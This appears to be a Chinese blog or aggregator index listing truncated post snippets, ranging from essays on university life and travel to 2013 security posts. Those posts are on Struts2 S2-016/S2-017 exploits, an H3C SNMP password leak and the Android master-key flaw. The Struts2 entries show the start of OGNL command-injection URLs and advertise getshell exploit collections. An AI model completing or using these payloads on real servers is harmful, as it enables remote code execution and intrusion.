上回说到开源软件用的是赞助模式,由商业公司赞助基金会,基金会资助开源软件作者的开发。有朋友提醒我微软已经不在Linux基金会的赞助名单里了,我上官网看了一下,确实没有了。不过这不重要,我们明白开源软件...
上大学这件事
昨天收到了几百个提问和建议,很多话题都非常好,我已经记下了,会挑一些慢慢写来。今天先挑几个简单的。 时间回到十多年前,我刚上大学的时候,有一位同校的大四学长,是我的老乡,我去读书前还特意来拜访过我,对...
想上什么大学就上什么大学
继续聊聊大学。 我这个人对生活的记忆力一向不怎么好,所以现在每每回想起大学生涯,恍如隔世一般,很多记忆碎片都模糊了。以后再想起什么就写点什么吧。 有一个被人问滥了的问题,你为什么要上大学?继而引申出来...
道友们推荐的小众旅游景点【国内篇】
前天请大家推荐一些鲜有人知的度假、旅游胜地,然后说好今天整理大家的推荐。之所以是今天贴出来,是因为我昨天在高铁上,不方便整理。 请大家推荐一些小众的好玩的地方后,发现大多数朋友都只回复了一个地名或一句...
Struts2 s-017 Working EXP
http://www.example.com/struts2-showcase/employee/save.action?redirect:${%23a%3d(new java.lang.Proces...
h3c snmp获取管理员登录密码
参考资料 WooYun: 中国移动H3C防火墙侧漏,利用snmp获取管理员密码,成功登录设备! 测试型号:h3c SecPath F5000-A5 漏洞详情 管理员用户名和密码可以通过snmp读取,从...
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本
struts2 最新S2-016-S2-017漏洞通杀struts2所有版本 园长 (你在身边就是缘,缘分写在数据库里面。) | 2013-07-17 12:29 Struts2这个不争气的家伙。已经...
Struts2 S2-016/S2-017 查看物理路径 EXP
http://www.xxx.com/xxxx.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2...
Struts2 S2-016/S2-017 命令执行带回显、看web路径、getshell exp整理
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。 喜欢就点一下感谢吧^_^ 带回显命令执行: http://www.example.com/struts2-blank/examp...
Bluebox Security提报Android 绕过应用签名认证漏洞原理
标 题: 【原创】Bluebox Security提报Android 绕过应用签名认证漏洞原理 作 者: jiazhijun 时 间: 2013-07-09,15:30:06 链 接: http://...
Android uncovers master-key 漏洞分析
0x00 背景 Bluebox的CTO Jeff Forristal在其官方blog爆出一个漏洞叫做UNCOVERING ANDROID MASTER KEY,大致是不篡改签名修改android代码。...
黑客讲坛:你确定你敢点我?
互联网中充斥着无数个链接,我们每天上网所做的事情,就是点开一个链接,跳转到另外一个链接。可你知道你点开的这些链接在背后里都做了些什么见不得人的事情么? 国内的大多数网民,都习惯了腾讯为他们做好的大局域...
1101